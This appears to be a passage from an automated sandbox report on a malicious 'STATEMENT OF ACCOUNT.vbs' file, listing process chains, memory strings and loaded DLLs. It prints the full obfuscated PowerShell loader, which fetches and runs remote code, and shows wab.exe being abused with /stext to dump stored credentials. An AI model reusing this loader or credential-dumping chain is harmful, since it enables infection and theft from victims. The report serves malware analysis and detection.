                Source: wab.exe, 00000009.00000002.3005639925.0000000022660000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: wab.exe, 0000000A.00000002.2348783900.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2347963788.00000000036F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000002.2374444370.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000D.00000003.2371429800.00000000034F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: wab.exe, wab.exe, 0000000A.00000002.2348223895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, wab.exe, 0000000D.00000002.2371702960.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: C:\Program Files (x86)\Windows Mail\wab.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_11-32947
                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\STATEMENT OF ACCOUNT.vbs"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)SnaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t"Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima"Jump to behavior
                Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk"Jump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
